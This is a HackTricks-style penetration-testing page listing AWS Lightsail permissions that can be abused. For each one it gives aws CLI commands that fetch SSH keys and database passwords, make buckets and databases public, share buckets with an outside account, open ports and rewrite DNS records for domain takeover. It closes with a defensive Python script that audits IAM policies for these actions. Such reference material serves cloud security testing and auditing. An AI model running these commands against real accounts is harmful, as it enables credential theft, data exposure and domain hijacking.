# AWS - Lightsail Privesc

{{#include ../../../../banners/hacktricks-training.md}}

## Lightsail

For more information about Lightsail check:

{{#ref}}
../../aws-services/aws-lightsail-enum.md
{{#endref}}

> [!WARNING]
> It’s important to note that Lightsail **doesn’t use IAM roles belonging to the user** but to an AWS managed account, so you can’t abuse this service to privesc. However, **sensitive data** such as code, API keys and database info could be found in this service.

### lightsail:DownloadDefaultKeyPair

This permission will allow you to get the SSH keys to access the instances:

```bash
aws lightsail download-default-key-pair
```

Potential Impact: Find sensitive info inside the instances.

### lightsail:GetInstanceAccessDetails

This permission will allow you to generate SSH keys to access the instances:

```bash
aws lightsail get-instance-access-details --instance-name <instance_name>
```

Potential Impact: Find sensitive info inside the instances.

### lightsail:CreateBucketAccessKey

This permission will allow you to get a key to access the bucket:

```bash
aws lightsail create-bucket-access-key --bucket-name <name>
```

Potential Impact: Find sensitive info inside the bucket.

### lightsail:GetRelationalDatabaseMasterUserPassword

This permission will allow you to get the credentials to access the database:

```bash
aws lightsail get-relational-database-master-user-password --relational-database-name <name>
```

Potential Impact: Find sensitive info inside the database.

### lightsail:UpdateRelationalDatabase

This permission will allow you to change the password to access the database:

```bash
aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>
```

If the database isn't public, you could also make it public with this permission:

```bash
aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible
```

Potential Impact: Find sensitive info inside the database.

### lightsail:OpenInstancePublicPorts

This permission allows opening ports to the Internet:

```bash
aws lightsail open-instance-public-ports \
    --instance-name MEAN-2 \
    --port-info fromPort=22,protocol=TCP,toPort=22
```

Potential Impact: Access sensitive ports.

### lightsail:PutInstancePublicPorts

This permission allows opening ports to the Internet. Note that the call will close any open port not specified in it.

```bash
aws lightsail put-instance-public-ports \
    --instance-name MEAN-2 \
    --port-infos fromPort=22,protocol=TCP,toPort=22
```

Potential Impact: Access sensitive ports.

### lightsail:SetResourceAccessForBucket

This permission allows giving an instance access to a bucket without any extra credentials:

```bash
aws lightsail set-resource-access-for-bucket \
    --resource-name <instance-name> \
    --bucket-name <bucket-name> \
    --access allow
```

Potential Impact: Potential new access to buckets with sensitive information.

### lightsail:UpdateBucket

With this permission an attacker could grant their own AWS account read access to buckets or even make the buckets public to everyone:

```bash
# Grant read access to an external account
aws lightsail update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read access to the public
aws lightsail update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private, but single objects can be made public
aws lightsail update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true
```

Potential Impact: Potential new access to buckets with sensitive information.

### lightsail:UpdateContainerService

With this permission an attacker could grant the container service access to private ECR repositories:

```bash
# isActive is a boolean: true enables the ECR image puller role
aws lightsail update-container-service \
    --service-name <name> \
    --private-registry-access ecrImagePullerRole={isActive=true}
```

Potential Impact: Get sensitive information from private ECR.

### lightsail:CreateDomainEntry

An attacker with this permission could create a subdomain and point it to their own IP address (subdomain takeover), craft an SPF record that allows them to spoof emails from the domain, or even point the main domain at their own IP address.

```bash
aws lightsail create-domain-entry \
    --domain-name example.com \
    --domain-entry name=dev.example.com,type=A,target=192.0.2.0
```

Potential Impact: Takeover of a domain.

### lightsail:UpdateDomainEntry

An attacker with this permission could create a subdomain and point it to their own IP address (subdomain takeover), craft an SPF record that allows them to spoof emails from the domain, or even point the main domain at their own IP address.

```bash
aws lightsail update-domain-entry \
    --domain-name example.com \
    --domain-entry name=dev.example.com,type=A,target=192.0.2.0
```

Potential Impact: Takeover of a domain.
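To audit who actually holds the permissions listed above, the following added example (not part of HackTricks or AWS tooling) checks an IAM policy document against this page's Lightsail actions, expanding IAM's `*`/`?` wildcards and honouring explicit denies; the sample policy is constructed for illustration.

```python
import fnmatch

# Actions discussed on this page, keyed to what each one exposes.
SENSITIVE_LIGHTSAIL_ACTIONS = {
    "lightsail:DownloadDefaultKeyPair": "SSH keys for instances",
    "lightsail:GetInstanceAccessDetails": "SSH keys for instances",
    "lightsail:CreateBucketAccessKey": "bucket access key",
    "lightsail:GetRelationalDatabaseMasterUserPassword": "database credentials",
    "lightsail:UpdateRelationalDatabase": "database password change / public exposure",
    "lightsail:OpenInstancePublicPorts": "instance ports opened to the Internet",
    "lightsail:PutInstancePublicPorts": "instance ports opened to the Internet",
    "lightsail:SetResourceAccessForBucket": "instance access to buckets",
    "lightsail:UpdateBucket": "bucket shared with other accounts / made public",
    "lightsail:UpdateContainerService": "pull access to private ECR",
    "lightsail:CreateDomainEntry": "DNS record creation (domain takeover)",
    "lightsail:UpdateDomainEntry": "DNS record change (domain takeover)",
}

def _matches(pattern, action):
    # IAM action matching is case-insensitive and supports the '*' and '?' wildcards.
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())

def granted_sensitive_actions(policy):
    """Return the sensitive Lightsail actions an IAM policy document allows.

    Expands wildcards in Allow statements, then removes anything covered by a
    Deny statement (an explicit deny always wins in IAM). Resource, Condition
    and NotAction are not evaluated, so the result is an upper bound.
    """
    allowed, denied = set(), set()
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be given as an object
        statements = [statements]
    for stmt in statements:
        actions = stmt.get("Action", [])
        if isinstance(actions, str):  # "Action" may be a string or a list
            actions = [actions]
        target = allowed if stmt.get("Effect") == "Allow" else denied
        for pattern in actions:
            target.update(a for a in SENSITIVE_LIGHTSAIL_ACTIONS if _matches(pattern, a))
    return sorted(allowed - denied)

# Constructed sample policy: broad Get*/Update* wildcards plus one explicit deny.
SAMPLE_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["lightsail:Get*", "lightsail:Update*"], "Resource": "*"},
    {"Effect": "Deny", "Action": "lightsail:UpdateDomainEntry", "Resource": "*"}]}

if __name__ == "__main__":
    for action in granted_sensitive_actions(SAMPLE_POLICY):
        print(f"{action}: {SENSITIVE_LIGHTSAIL_ACTIONS[action]}")
```

Run it against the policy documents returned by `aws iam get-policy-version` or inline role policies to spot the wildcard grants (`lightsail:*`, `lightsail:Update*`) that silently include these actions.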

{{#include ../../../../banners/hacktricks-training.md}}